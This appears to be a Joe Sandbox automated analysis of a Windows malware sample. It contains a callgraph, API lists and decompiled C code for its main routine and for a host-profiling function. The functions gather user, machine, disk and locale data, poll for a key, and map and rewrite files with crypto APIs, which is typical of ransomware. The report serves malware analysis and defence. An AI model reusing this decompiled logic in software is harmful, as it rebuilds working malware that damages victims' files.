f9d2ec5 ShowWindow UpdateWindow CreateThread 2228->2232 2233 f9d2d99 2230->2233 2234 f9d2eed CloseHandle 2232->2234 2235 f9d2ef4 GetMessageW 2232->2235 2233->2227 2238 f9d2f50 7 API calls 2233->2238 2234->2235 2236 f9d2f3d ExitThread 2235->2236 2237 f9d2f0b 2235->2237 2239 f9d2f17 TranslateMessage DispatchMessageW 2237->2239 2240 f9d2dce 2238->2240 2239->2236 2241 f9d2f2c GetMessageW 2239->2241 2240->2236 2255 f9d30a0 2240->2255 2241->2236 2241->2239 2246 f9d2f7d 2245->2246 2247 f9d2f82 VirtualAlloc 2245->2247 2246->2226 2248 f9d2f9f EnumDeviceDrivers 2247->2248 2249 f9d2f99 2247->2249 2250 f9d2fae 2248->2250 2251 f9d2ff2 VirtualFree 2248->2251 2249->2226 2250->2251 2252 f9d2fc0 GetDeviceDriverBaseNameW 2250->2252 2251->2226 2252->2250 2253 f9d2fd9 lstrcmpiW 2252->2253 2253->2250 2254 f9d3009 VirtualFree 2253->2254 2254->2226 2256 f9d2f50 7 API calls 2255->2256 2257 f9d3151 2256->2257 2258 f9d2f50 7 API calls 2257->2258 2263 f9d2ddb 2257->2263 2259 f9d3160 2258->2259 2260 f9d2f50 7 API calls 2259->2260 2259->2263 2261 f9d316c 2260->2261 2262 f9d2f50 7 API calls 2261->2262 2261->2263 2262->2263 2263->2236 2264 f9d2ad0 VirtualAlloc 2263->2264 2265 f9d2b02 GetModuleFileNameW GetTempPathW 2264->2265 2267 f9d2b48 2265->2267 2268 f9d2b4c 2267->2268 2269 f9d2b53 lstrlenW 2267->2269 2307 f9d2960 lstrlenW 2268->2307 2279 f9d8150 CryptAcquireContextW 2269->2279 2271 f9d2b8e GetEnvironmentVariableW 2273 f9d2bac 2271->2273 2275 f9d2bd8 lstrcatW lstrcatW lstrcatW 2273->2275 2278 f9d2bb0 2273->2278 2274 f9d2c45 ExitThread 2290 f9d2890 CreateFileW 2275->2290 2277 f9d2c2f wsprintfW 2277->2268 2278->2274 2278->2277 2280 f9d8269 2279->2280 2281 f9d817b 2279->2281 2280->2271 2281->2281 2282 f9d818e VirtualAlloc 2281->2282 2283 f9d81ab 2282->2283 2284 f9d8272 CryptReleaseContext VirtualFree 2282->2284 2283->2284 2285 f9d81b3 GetModuleHandleA 2283->2285 2284->2271 2286 f9d81f9 LoadLibraryA 2285->2286 2287 f9d8207 GetProcAddress 2285->2287 2286->2287 2289 f9d8216 CryptReleaseContext VirtualFree 2286->2289 2287->2289 2289->2280 2291 f9d28f9 2290->2291 2292 f9d28b8 GetFileSize 2290->2292 2291->2278 2312 f9d3030 2292->2312 2295 f9d3030 7 API calls 2296 f9d28d5 CreateFileMappingW 2295->2296 2297 f9d2902 MapViewOfFile 2296->2297 2298 f9d28f2 CloseHandle 2296->2298 2299 f9d2948 CloseHandle CloseHandle 2297->2299 2300 f9d2916 2297->2300 2298->2291 2299->2278 2301 f9d3030 7 API calls 2300->2301 2302 f9d291b 2301->2302 2303 f9d292b 2302->2303 2317 f9d82a0 CryptAcquireContextW 2302->2317 2328 f9d2830 CreateFileW 2303->2328 2308 f9d8150 9 API calls 2307->2308 2309 f9d29ad RegCreateKeyExW 2308->2309 2310 f9d2a8e lstrlenW RegSetValueExW RegCloseKey 2309->2310 2311 f9d2ac0 2309->2311 2310->2274 2311->2274 2313 f9d2f50 7 API calls 2312->2313 2314 f9d307f 2313->2314 2315 f9d2f50 7 API calls 2314->2315 2316 f9d28c8 2314->2316 2315->2316 2316->2295 2318 f9d82ce VirtualAlloc 2317->2318 2319 f9d8392 2317->2319 2321 f9d82f8 2318->2321 2322 f9d839b CryptReleaseContext VirtualFree 2318->2322 2319->2303 2321->2322 2323 f9d8301 GetModuleHandleA 2321->2323 2322->2303 2324 f9d8355 GetProcAddress 2323->2324 2325 f9d8347 LoadLibraryA 2323->2325 2326 f9d8379 CryptReleaseContext VirtualFree 2324->2326 2327 f9d8364 2324->2327 2325->2324 2325->2326 2326->2319 2327->2326 2329 f9d287f UnmapViewOfFile 2328->2329 2330 f9d285b 2328->2330 2329->2299 2331 f9d285f WriteFile 2330->2331 2332 f9d2873 2330->2332 2331->2332 2333 f9d2878 CloseHandle 2331->2333 2332->2333 2333->2329 2334 f9d2c50 2335 f9d2c7b 2334->2335 2336 f9d2cda CreateThread DestroyWindow 2334->2336 2337 f9d2c97 BeginPaint lstrlenW TextOutW EndPaint 2335->2337 2338 f9d2c80 DefWindowProcW 2335->2338 2482 f9d90a0 IsProcessorFeaturePresent 2483 f9d90c6 2482->2483 2484 f9d5ec0 2485 f9d5ee2 2484->2485 2486 f9d5f0e GetPEB 2485->2486 2487 f9d5f28 2486->2487 2488 f9d6de0 VirtualAlloc wsprintfW InitializeCriticalSection VirtualAlloc 2489 f9d6c90 111 API calls 2488->2489 2490 f9d6e70 VirtualFree ExitThread 2489->2490

                                        Callgraph

                                        • Executed
                                        • Not Executed
                                        • Opacity -> Relevance
                                        • Disassembly available
                                        callgraph 0 Function_0F9D8D9C 1 Function_0F9D6C90 1->1 50 Function_0F9D6BE0 1->50 80 Function_0F9D6950 1->80 89 Function_0F9D6A40 1->89 90 Function_0F9D6640 1->90 2 Function_0F9D3190 3 Function_0F9D4E90 43 Function_0F9D4DE0 3->43 91 Function_0F9D4C40 3->91 4 Function_0F9D6790 5 Function_0F9D2890 19 Function_0F9D82A0 5->19 67 Function_0F9D3030 5->67 69 Function_0F9D2830 5->69 6 Function_0F9D5190 7 Function_0F9D6E90 36 Function_0F9D7EF0 7->36 49 Function_0F9D7CE0 7->49 8 Function_0F9D8090 9 Function_0F9D6390 10 Function_0F9D8990 11 Function_0F9D5880 18 Function_0F9D54A0 11->18 40 Function_0F9D39F0 11->40 54 Function_0F9D9010 11->54 57 Function_0F9D7C10 11->57 70 Function_0F9D7330 11->70 77 Function_0F9D5E20 11->77 88 Function_0F9D6F40 11->88 92 Function_0F9D7140 11->92 94 Function_0F9D5D70 11->94 12 Function_0F9D5EB0 13 Function_0F9D62B0 14 Function_0F9D72B0 15 Function_0F9D32B0 16 Function_0F9D64B0 17 Function_0F9D48A8 21 Function_0F9D53A0 18->21 18->36 18->49 53 Function_0F9D5210 18->53 18->54 97 Function_0F9D5060 18->97 20 Function_0F9D90A0 22 Function_0F9D3AA0 23 Function_0F9D30A0 84 Function_0F9D2F50 23->84 24 Function_0F9D4BD5 35 Function_0F9D64F0 24->35 25 Function_0F9D41D6 25->8 25->57 26 Function_0F9D4CD0 27 Function_0F9D2AD0 27->5 27->8 86 Function_0F9D8150 27->86 98 Function_0F9D2960 27->98 28 Function_0F9D63D0 29 Function_0F9D8DCC 30 Function_0F9D8FC4 31 Function_0F9D89C0 32 Function_0F9D83C0 33 Function_0F9D5EC0 33->12 34 Function_0F9D8DF4 36->49 37 Function_0F9D46F0 38 Function_0F9D4BF0 82 Function_0F9D4950 38->82 39 Function_0F9D34F0 41 Function_0F9D8EE9 42 Function_0F9D43E0 74 Function_0F9D3B20 42->74 43->10 43->26 44 Function_0F9D33E0 44->2 44->15 62 Function_0F9D3200 44->62 78 Function_0F9D3320 44->78 45 Function_0F9D35E0 45->19 45->28 45->31 45->32 64 Function_0F9D3500 45->64 72 Function_0F9D6530 45->72 46 Function_0F9D3BE0 46->22 46->74 47 Function_0F9D6DE0 47->1 48 Function_0F9D69E0 51 Function_0F9D40E0 51->8 51->40 51->57 51->70 51->88 51->92 52 Function_0F9D2D10 53->6 53->44 53->54 53->77 53->94 55 Function_0F9D8C10 56 Function_0F9D7A10 58 Function_0F9D6D09 58->1 58->80 59 Function_0F9D4C0B 60 Function_0F9D4600 60->40 60->57 60->70 60->88 60->92 61 Function_0F9D4000 61->16 61->35 73 Function_0F9D3E20 61->73 63 Function_0F9D8100 76 Function_0F9D1020 64->76 65 Function_0F9D7A00 66 Function_0F9D4930 67->84 68 Function_0F9D4030 70->7 70->14 70->56 85 Function_0F9D8950 70->85 71 Function_0F9D2D30 71->23 71->27 71->84 72->39 93 Function_0F9D5670 73->93 74->54 75 Function_0F9D1C20 79 Function_0F9D6420 79->13 80->4 80->45 81 Function_0F9D6850 80->81 82->9 82->11 82->22 82->28 82->37 82->42 82->46 82->51 82->60 82->61 82->66 82->68 82->73 82->79 83 Function_0F9D2C50 87 Function_0F9D8C48 89->48 89->63 90->8 91->54 93->18 93->40 93->54 93->57 93->70 93->77 93->88 93->92 93->94 94->54 95 Function_0F9D8C6C 96 Function_0F9D8D6E 97->3 98->86

                                        Executed Functions

                                        Function 0F9D4950 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 182threadsleepmemoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                        			E0F9D4950() {
				void* _v8;
				void* _v12;
				CHAR* _v16;
				int _v20;
				void* _v24;
				int _v28;
				void* _v32;
				int _v36;
				int _v40;
				int _v44;
				int _v48;
				int _v52;
				int _v60;
				char _v80;
				void* _t54;
				int _t79;
				void* _t81;
				short* _t97;
				void* _t114;

				Sleep(0x3e8); // executed
				_t54 = E0F9D4600(_t90, _t106); // executed
				if(_t54 == 0) {
					_v8 = CreateThread(0, 0, E0F9D2D30, 0, 0, 0);
					if(_v8 != 0) {
						if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
							_t90 = _v8;
							TerminateThread(_v8, 0);
						}
						_t106 = _v8;
						CloseHandle(_v8);
					}
					E0F9D46F0();
					E0F9D40E0(_t90, _t106);
					E0F9D6420( &_v80);
					_v40 = 0;
					_v36 = 0;
					_v28 = 0;
					_v44 = 0;
					E0F9D63D0( &_v80,  &_v28,  &_v44,  &_v40,  &_v36);
					_v48 = 0;
					_v16 = 0;
					if(E0F9D4930(_v28) == 0) {
						while(_v48 == 0) {
							_t81 = E0F9D5880(_v28, _v44, _v40, _v36,  &_v16);
							_t114 = _t114 + 0xc;
							if(_t81 != 0) {
								_v48 = 1;
							} else {
								Sleep(0x2710);
							}
						}
						E0F9D6390( &_v80);
						_v32 = 0;
						_v20 = 0;
						_v52 = 0;
						_v60 = 0;
						__eflags = _v16;
						if(_v16 == 0) {
							L19:
							E0F9D4030();
							InitializeCriticalSection(0xf9e2a48);
							__eflags = _v52;
							if(__eflags == 0) {
								E0F9D3E20( &_v80);
							} else {
								E0F9D4000(_v32, _v20, __eflags);
							}
							DeleteCriticalSection(0xf9e2a48);
							__eflags = E0F9D3AA0();
							if(__eflags != 0) {
								E0F9D43E0(__eflags);
							}
							_v24 = VirtualAlloc(0, 0x200, 0x3000, 4);
							__eflags = _v24;
							if(__eflags != 0) {
								GetModuleFileNameW(0, _v24, 0x100);
								E0F9D3BE0(_v24, _v24, __eflags);
								VirtualFree(_v24, 0, 0x8000);
							}
							__eflags =  *0xf9e2a44;
							if( *0xf9e2a44 != 0) {
								_t97 =  *0xf9e2a44; // 0x60000
								ShellExecuteW(0, L"open", _t97, 0, 0, 5);
							}
							ExitThread(0);
						}
						_v20 = lstrlenA(_v16);
						_v32 = VirtualAlloc(0, _v20, 0x3000, 4);
						_t79 = CryptStringToBinaryA(_v16, 0, 1, _v32,  &_v20, 0, 0);
						__eflags = _t79;
						if(_t79 != 0) {
							_v52 = 1;
							goto L19;
						}
						ExitProcess(0);
					} else {
						_v12 = VirtualAlloc(0, 0x200, 0x3000, 4);
						_t119 = _v12;
						if(_v12 != 0) {
							GetModuleFileNameW(0, _v12, 0x100);
							E0F9D3BE0(_v12,  &_v44, _t119);
							VirtualFree(_v12, 0, 0x8000);
						}
						ExitProcess(0);
					}
				}
				ExitProcess(0); // executed
			}






















                                        0x0f9d495b
                                        0x0f9d4961
                                        0x0f9d4968
                                        0x0f9d4987
                                        0x0f9d498e
                                        0x0f9d49a4
                                        0x0f9d49a8
                                        0x0f9d49ac
                                        0x0f9d49ac
                                        0x0f9d49b2
                                        0x0f9d49b6
                                        0x0f9d49b6
                                        0x0f9d49bc
                                        0x0f9d49c1
                                        0x0f9d49c9
                                        0x0f9d49ce
                                        0x0f9d49d5
                                        0x0f9d49dc
                                        0x0f9d49e3
                                        0x0f9d49fd
                                        0x0f9d4a02
                                        0x0f9d4a09
                                        0x0f9d4a1a
                                        0x0f9d4a6b
                                        0x0f9d4a83
                                        0x0f9d4a88
                                        0x0f9d4a8d
                                        0x0f9d4a9c
                                        0x0f9d4a8f
                                        0x0f9d4a94
                                        0x0f9d4a94
                                        0x0f9d4aa3
                                        0x0f9d4aa8
                                        0x0f9d4aad
                                        0x0f9d4ab4
                                        0x0f9d4abb
                                        0x0f9d4ac2
                                        0x0f9d4ac9
                                        0x0f9d4acd
                                        0x0f9d4b1f
                                        0x0f9d4b1f
                                        0x0f9d4b29
                                        0x0f9d4b2f
                                        0x0f9d4b33
                                        0x0f9d4b45
                                        0x0f9d4b35
                                        0x0f9d4b3b
                                        0x0f9d4b3b
                                        0x0f9d4b4f
                                        0x0f9d4b5a
                                        0x0f9d4b5c
                                        0x0f9d4b5e
                                        0x0f9d4b5e
                                        0x0f9d4b77
                                        0x0f9d4b7a
                                        0x0f9d4b7e
                                        0x0f9d4b8b
                                        0x0f9d4b94
                                        0x0f9d4ba4
                                        0x0f9d4ba4
                                        0x0f9d4baa
                                        0x0f9d4bb1
                                        0x0f9d4bb9
                                        0x0f9d4bc7
                                        0x0f9d4bc7
                                        0x0f9d4bcf
                                        0x0f9d4bcf
                                        0x0f9d4ad9
                                        0x0f9d4aef
                                        0x0f9d4b06
                                        0x0f9d4b0c
                                        0x0f9d4b0e
                                        0x0f9d4b18
                                        0x00000000
                                        0x0f9d4b18
                                        0x0f9d4b12
                                        0x0f9d4a1c
                                        0x0f9d4a30
                                        0x0f9d4a33
                                        0x0f9d4a37
                                        0x0f9d4a44
                                        0x0f9d4a4d
                                        0x0f9d4a5d
                                        0x0f9d4a5d
                                        0x0f9d4a65
                                        0x0f9d4a65
                                        0x0f9d4a1a
                                        0x0f9d496c

                                        APIs
                                        • Sleep.KERNELBASE(000003E8), ref: 0F9D495B
                                          • Part of subcall function 0F9D4600: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D465C
                                          • Part of subcall function 0F9D4600: lstrcpyW.KERNEL32 ref: 0F9D467F
                                          • Part of subcall function 0F9D4600: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4686
                                          • Part of subcall function 0F9D4600: CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D469E
                                          • Part of subcall function 0F9D4600: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46AA
                                          • Part of subcall function 0F9D4600: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46B1
                                          • Part of subcall function 0F9D4600: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46CB
                                        • ExitProcess.KERNEL32 ref: 0F9D496C
                                        • CreateThread.KERNEL32 ref: 0F9D4981
                                        • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 0F9D4999
                                        • TerminateThread.KERNEL32(00000000,00000000), ref: 0F9D49AC
                                        • CloseHandle.KERNEL32(00000000), ref: 0F9D49B6
                                        • VirtualAlloc.KERNEL32(00000000,00000200,00003000,00000004,00000000,00000000,00000000,00000000), ref: 0F9D4A2A
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F9D4A44
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D4A5D
                                        • ExitProcess.KERNEL32 ref: 0F9D4A65
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocCreateErrorExitFreeLastProcessThread$CloseFileHandleModuleMutexNameObjectSingleSleepTerminateWaitlstrcpylstrlen
                                        • String ID: open
                                        • API String ID: 1803241880-2758837156
                                        • Opcode ID: 9136fcd2564ae6bddbfd51de2acd97257eca2c5ca8741ec4a13773ee70ffb6b9
                                        • Instruction ID: fdc6b6d1c67c11643e8d9a4aae9d46fc8452dfa71bc028d6fef35184dbc77727
                                        • Opcode Fuzzy Hash: 9136fcd2564ae6bddbfd51de2acd97257eca2c5ca8741ec4a13773ee70ffb6b9
                                        • Instruction Fuzzy Hash: DC710D70A45309ABEB14DBA4DC5AFEE7B78AB44716F308014F2017A1C2DBB86994CF65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D7330 Relevance: 142.2, APIs: 55, Strings: 26, Instructions: 499memorystringregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 f9d7330-f9d7347 1 f9d736e-f9d7372 0->1 2 f9d7349-f9d7368 VirtualAlloc GetUserNameW 0->2 3 f9d7374-f9d7390 VirtualAlloc GetComputerNameW 1->3 4 f9d7396-f9d73a0 1->4 2->1 3->4 5 f9d73f6-f9d73fa 4->5 6 f9d73a2-f9d73b7 VirtualAlloc 4->6 7 f9d7495-f9d7499 5->7 8 f9d7400-f9d743a VirtualAlloc RegOpenKeyExW 5->8 6->5 9 f9d73b9-f9d73cf call f9d72b0 6->9 12 f9d749f-f9d74cd VirtualAlloc * 2 7->12 13 f9d7599-f9d759d 7->13 10 f9d743c-f9d745e RegQueryValueExW 8->10 11 f9d747e-f9d748f VirtualFree 8->11 20 f9d73d4-f9d73d6 9->20 15 f9d7469 GetLastError 10->15 16 f9d7460-f9d7467 10->16 11->7 19 f9d74d4-f9d7507 wsprintfW RegOpenKeyExW 12->19 17 f9d759f-f9d75cf VirtualAlloc call f9d72b0 13->17 18 f9d75fb-f9d75ff 13->18 21 f9d746f-f9d747c RegCloseKey 15->21 16->21 17->18 43 f9d75d1-f9d75f8 call f9d72b0 wsprintfW 17->43 25 f9d766e-f9d7672 18->25 26 f9d7601-f9d7622 GetNativeSystemInfo VirtualAlloc 18->26 23 f9d7509-f9d7529 RegQueryValueExW 19->23 24 f9d7564-f9d7566 19->24 27 f9d73e9-f9d73ee 20->27 28 f9d73d8-f9d73df 20->28 21->7 21->11 34 f9d752b-f9d7532 23->34 35 f9d7534 GetLastError 23->35 30 f9d7569-f9d756c 24->30 31 f9d768f-f9d7693 25->31 32 f9d7674-f9d768a call f9d7a10 25->32 36 f9d7624-f9d762b 26->36 37 f9d7663 26->37 29 f9d73f1-f9d73f3 wsprintfW 27->29 28->5 38 f9d73e1-f9d73e7 28->38 29->5 39 f9d756e-f9d7570 30->39 40 f9d7576-f9d7593 wsprintfW VirtualFree 30->40 44 f9d77d9 31->44 45 f9d7699-f9d7727 VirtualAlloc * 2 GetWindowsDirectoryW GetVolumeInformationW call f9d72b0 31->45 32->31 60 f9d768c 32->60 46 f9d753a-f9d7547 RegCloseKey 34->46 35->46 36->37 47 f9d765c-f9d7661 36->47 48 f9d764e-f9d7653 36->48 49 f9d7655-f9d765a 36->49 50 f9d7647-f9d764c 36->50 51 f9d7632-f9d7641 wsprintfW ExitProcess 36->51 41 f9d7668-f9d766b wsprintfW 37->41 38->29 39->19 39->40 40->13 41->25 43->18 52 f9d77df-f9d77e3 44->52 66 f9d7729-f9d7755 lstrlenW call f9d72b0 45->66 67 f9d775a-f9d779b wsprintfW lstrcatW GetModuleHandleW GetProcAddress 45->67 46->24 56 f9d7549-f9d7559 lstrcmpiW 46->56 47->41 48->41 49->41 50->41 58 f9d77e9-f9d7839 VirtualAlloc 52->58 59 f9d7992-f9d7999 52->59 56->51 57 f9d755f-f9d7562 56->57 57->30 63 f9d7840-f9d784b 58->63 64 f9d799b-f9d79b7 VirtualAlloc 59->64 65 f9d79e0-f9d79eb 59->65 60->31 63->63 73 f9d784d-f9d785f 63->73 71 f9d79b9-f9d79c2 call f9d6e90 64->71 72 f9d79d6 64->72 66->67 69 f9d779d-f9d77b7 lstrlenW 67->69 70 f9d77b9 67->70 74 f9d77c0-f9d77d7 VirtualFree 69->74 70->74 71->65 83 f9d79c4-f9d79d0 VirtualFree 71->83 72->65 75 f9d7862-f9d787a GetDriveTypeW 73->75 74->52 79 f9d796d 75->79 80 f9d7880-f9d7883 75->80 82 f9d7973-f9d797d 79->82 80->79 81 f9d7889-f9d78d0 lstrcatW * 3 GetDiskFreeSpaceW 80->81 85 f9d78d6-f9d7961 call f9d8950 * 2 lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 81->85 86 f9d7963-f9d796b lstrcatW 81->86 82->75 84 f9d7983-f9d798d lstrlenW 82->84 83->72 84->59 85->82 86->79
                                        C-Code - Quality: 88%
                                        			E0F9D7330(DWORD* __ecx, void* __edx) {
				void* _v8;
				void* _v12;
				long _v16;
				long _v20;
				int _v24;
				int _v28;
				intOrPtr _v32;
				short _v36;
				short _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				signed short _v76;
				char _v132;
				void* _t154;
				long _t155;
				short _t158;
				short _t159;
				short _t160;
				signed int _t161;
				signed int _t166;
				void* _t181;
				signed int _t183;
				signed int _t186;
				WCHAR* _t190;
				void* _t191;
				void* _t199;
				_Unknown_base(*)()* _t204;
				signed int _t211;
				intOrPtr _t216;
				WCHAR* _t218;
				WCHAR* _t220;
				void* _t224;
				int _t230;
				void* _t238;
				WCHAR* _t246;
				void* _t247;
				WCHAR* _t249;
				WCHAR* _t250;
				WCHAR* _t252;
				void* _t256;
				DWORD* _t260;
				short* _t261;
				DWORD* _t266;
				void* _t267;
				signed int _t270;
				void* _t274;
				void* _t276;
				void* _t277;
				DWORD* _t279;
				void* _t280;
				void* _t281;

				_t267 = __edx;
				_t260 = __ecx;
				_t279 = __ecx;
				if( *__ecx != 0) {
					_t252 = VirtualAlloc(0, 0x202, 0x3000, 4);
					_t260 =  &_v24;
					 *(_t279 + 8) = _t252;
					_v24 = 0x100;
					GetUserNameW(_t252, _t260);
				}
				if( *((intOrPtr*)(_t279 + 0xc)) != 0) {
					_v24 = 0x1e;
					_t250 = VirtualAlloc(0, 0x20, 0x3000, 4);
					_t260 =  &_v24;
					 *(_t279 + 0x14) = _t250;
					GetComputerNameW(_t250, _t260);
				}
				if( *((intOrPtr*)(_t279 + 0x18)) == 0) {
					L11:
					if( *(_t279 + 0x30) == 0) {
						L18:
						if( *((intOrPtr*)(_t279 + 0x3c)) == 0) {
							L31:
							if( *((intOrPtr*)(_t279 + 0x48)) != 0) {
								_t220 = VirtualAlloc(0, 0x82, 0x3000, 4);
								_push(_t260);
								 *(_t279 + 0x50) = _t220;
								if(E0F9D72B0(_t260, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"productName", _t220, 0x80) == 0) {
									_push(_t260);
									E0F9D72B0(_t260, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t279 + 0x50), 0x80);
									wsprintfW( *(_t279 + 0x50), L"error");
									_t281 = _t281 + 8;
								}
							}
							if( *((intOrPtr*)(_t279 + 0x54)) == 0) {
								L44:
								if( *((intOrPtr*)(_t279 + 0x24)) != 0) {
									_v28 = 0;
									_t216 = E0F9D7A10(_t279 + 0x2c,  &_v28);
									if(_t216 == 0) {
										 *((intOrPtr*)(_t279 + 0x24)) = _t216;
									}
								}
								if( *((intOrPtr*)(_t279 + 0x60)) != 0) {
									_t190 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x68) = _t190;
									_t191 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
									_t276 = _t191;
									GetWindowsDirectoryW(_t276, 0x100);
									_t66 = _t276 + 0x600; // 0x600
									_t266 = _t66;
									 *((short*)(_t276 + 6)) = 0;
									_t68 = _t276 + 0x400; // 0x400
									_t69 = _t276 + 0x604; // 0x604
									_t70 = _t276 + 0x608; // 0x608
									_t71 = _t276 + 0x200; // 0x200
									GetVolumeInformationW(_t276, _t71, 0x100, _t266, _t70, _t69, _t68, 0x100); // executed
									_push(_t266);
									_t72 = _t276 + 0x60c; // 0x60c
									_t260 = _t72;
									_t199 = E0F9D72B0(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"ProcessorNameString", _t260, 0x80); // executed
									if(_t199 != 0) {
										_t73 = _t276 + 0x60c; // 0x60c
										_t211 = lstrlenW(_t73);
										_t74 = _t276 + 0x60c; // 0x60c
										_t260 = _t74;
										_push(_t260);
										E0F9D72B0(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t260 + _t211 * 2, 0x80); // executed
									}
									wsprintfW( *(_t279 + 0x68), L"%d",  *(_t276 + 0x600));
									_t79 = _t276 + 0x60c; // 0x60c
									_t281 = _t281 + 0xc;
									lstrcatW( *(_t279 + 0x68), _t79);
									_t204 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
									_v28 = _t204;
									if(_t204 == 0) {
										 *(_t279 + 0x6c) = 0;
									} else {
										 *(_t279 + 0x6c) = _v28(0x29a,  *(_t279 + 0x68), lstrlenW( *(_t279 + 0x68)) + _t207);
									}
									 *(_t279 + 0x70) =  *(_t276 + 0x600);
									VirtualFree(_t276, 0, 0x8000); // executed
								}
								if( *((intOrPtr*)(_t279 + 0x74)) == 0) {
									L67:
									if( *(_t279 + 0x80) == 0) {
										L72:
										return 1;
									}
									_t154 = VirtualAlloc(0, 0x81, 0x3000, 4);
									 *(_t279 + 0x84) = _t154;
									if(_t154 == 0) {
										L71:
										 *(_t279 + 0x80) = 0;
										goto L72;
									}
									_push(_t260);
									_t155 = E0F9D6E90(_t154);
									if(_t155 != 0) {
										goto L72;
									}
									VirtualFree( *(_t279 + 0x84), _t155, 0x8000);
									goto L71;
								} else {
									_v68 = L"UNKNOWN";
									_v64 = L"NO_ROOT_DIR";
									_v60 = L"REMOVABLE";
									_v56 = L"FIXED";
									_v52 = L"REMOTE";
									_v48 = L"CDROM";
									_v44 = L"RAMDISK";
									 *(_t279 + 0x7c) = VirtualAlloc(0, 0x400, 0x3000, 4);
									_t261 =  &_v132;
									_t158 = 0x41;
									do {
										 *_t261 = _t158;
										_t261 = _t261 + 2;
										_t158 = _t158 + 1;
									} while (_t158 <= 0x5a);
									_t159 =  *L"?:\\"; // 0x3a003f
									_v40 = _t159;
									_t160 =  *0xf9df348; // 0x5c
									_v36 = _t160;
									_t161 = 0;
									_v24 = 0;
									do {
										_v40 =  *((intOrPtr*)(_t280 + _t161 * 2 - 0x80));
										_t270 = GetDriveTypeW( &_v40);
										if(_t270 > 2 && _t270 != 5) {
											_v36 = 0;
											lstrcatW( *(_t279 + 0x7c),  &_v40);
											_v36 = 0x5c;
											lstrcatW( *(_t279 + 0x7c),  *(_t280 + _t270 * 4 - 0x40));
											lstrcatW( *(_t279 + 0x7c), "_");
											if(GetDiskFreeSpaceW( &_v40,  &_v28,  &_v20,  &_v12,  &_v16) == 0) {
												lstrcatW( *(_t279 + 0x7c), L"0,");
												goto L64;
											}
											_v8 = E0F9D8950(_v16, 0, _v28 * _v20, 0);
											_t256 = _t267;
											_t181 = E0F9D8950(_v12, 0, _v28 * _v20, 0);
											_t274 = _v8;
											_v32 = _t274 - _t181;
											asm("sbb eax, edx");
											_v8 = _t256;
											_t183 = lstrlenW( *(_t279 + 0x7c));
											_push(_t256);
											wsprintfW( &(( *(_t279 + 0x7c))[_t183]), L"%I64u/", _t274);
											_t186 = lstrlenW( *(_t279 + 0x7c));
											_push(_v8);
											wsprintfW( &(( *(_t279 + 0x7c))[_t186]), L"%I64u", _v32);
											_t281 = _t281 + 0x20;
											lstrcatW( *(_t279 + 0x7c), ",");
										}
										_t161 = _v24 + 1;
										_v24 = _t161;
									} while (_t161 < 0x1b);
									_t166 = lstrlenW( *(_t279 + 0x7c));
									_t260 =  *(_t279 + 0x7c);
									 *((short*)(_t260 + _t166 * 2 - 2)) = 0;
									goto L67;
								}
							} else {
								__imp__GetNativeSystemInfo( &_v76);
								_t218 = VirtualAlloc(0, 0x40, 0x3000, 4);
								_t260 = _v76 & 0x0000ffff;
								 *(_t279 + 0x5c) = _t218;
								if(_t260 > 9) {
									L42:
									_push(L"Unknown");
									L43:
									wsprintfW(_t218, ??);
									_t281 = _t281 + 8;
									goto L44;
								}
								_t260 =  *(_t260 + E0F9D7A00) & 0x000000ff;
								switch( *((intOrPtr*)(_t260 * 4 +  &M0F9D79EC))) {
									case 0:
										_push(L"x86");
										goto L43;
									case 1:
										_push(L"ARM");
										goto L43;
									case 2:
										_push(L"Itanium");
										goto L43;
									case 3:
										_push(L"x64");
										goto L43;
									case 4:
										goto L42;
								}
							}
						}
						_t224 = VirtualAlloc(0, 0x8a, 0x3000, 4);
						_v8 = _t224;
						_v20 = _t224 + 0xe;
						 *(_t279 + 0x44) = VirtualAlloc(0, 4, 0x3000, 4);
